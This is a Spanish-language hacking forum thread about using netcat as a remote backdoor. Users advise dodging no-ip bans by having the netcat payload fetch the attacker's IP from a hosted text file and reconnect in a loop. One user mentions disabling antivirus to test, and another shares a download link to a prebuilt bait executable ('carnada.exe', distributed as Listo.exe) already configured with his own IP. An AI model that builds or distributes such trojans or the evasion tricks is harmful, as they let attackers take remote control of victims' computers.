Jugando con netcat

Iniciado por WHK, 25 Marzo 2007, 03:17 AM

0 Miembros y 1 Visitante están viendo este tema.

Chero

Pues yo diria que si se puede poner la direccion de tu no IP, q para eso esta, y con respecto a lootro no sabria decirte...

WHK

Citar"no se encuentra el archivo"
Es porque no encuentra el archivo que puede ser el netcat... talves el ciber tuene antivirus y te lo borra.

Cklaro que puedes poner tu no-ip en ves de tu ip aunque te banearán dentro de no mucho ya que los admins de no-ip prohiben estas cosas.
Busca otras alternativas, como por ejemplo poner tu ip en un txt en un host y que el netcat lo descargue y se conecte a esa ip con un loop goto.

¹4¹²

Cita de: WHK en 19 Julio 2008, 19:47 PM
Citar"no se encuentra el archivo"
Es porque no encuentra el archivo que puede ser el netcat... talves el ciber tuene antivirus y te lo borra.
Lo pruebo en otro pc mio, descativando el antivirus y todo....
...El Ladrón es un artista creativo capaz de crear robos asombrosos, mientras que el Detective se dedica a reconstruir su trabajo; lo que lo convierte en un mero crítico...

UnknownShadow

interesante, cuando pueda lo voy a probar

kraszic

buenas, e estado leyendo varios manuales como este sobre netcat, pero me gustaria saber si hay alguno q fuera de netcat desde 0 para los q no sabemos nada y queremos aprender a usarlo..

Tengo muchas dudas y preguntas q seguramente seran tontas y con un manual de menos nivel me aclararia todo.

saludos

linuxvswindows


linuxvswindows

Para el que kería el carnada.exe q lo baje desde este link, tiene el nombre Listo.exe


http://www.mediafire.com/download.php?jmifc46vp3y


Nota: ya está armado, por lo tanto tienes que cambiarle la Ip, o Dns xq ese es el mío, ah!! y de vez en cuanto intenta hackearme.... (jejeje  >:D)

GhozT

señor usted es todo un maestro desearia ser como usted y creo q algun dia lo sere pero todavia no

linuxvswindows

No seas lambeta, eso es un proyecto probado, aunque funcione, el tema de registro en ese link está mal, ya subiré el correcto

-Wrrzag-

#539
yo tengo un pequeño problema: cuando pongo por ejemplo : nc -vv 123.123.123.123 80 (o cualquier otra ip y puerto) me sale:

123.123.123.123: inverse host lookup failed: h_errno 11004: NO_DATA
<UNKNOWN [123.123.123.123] 80 <http>: TIMEOUT
sent 0, rcvd 0: NOTSOCK


He buscado en google y en foros y no encuentro nada... alguien me puede decir qué pasa?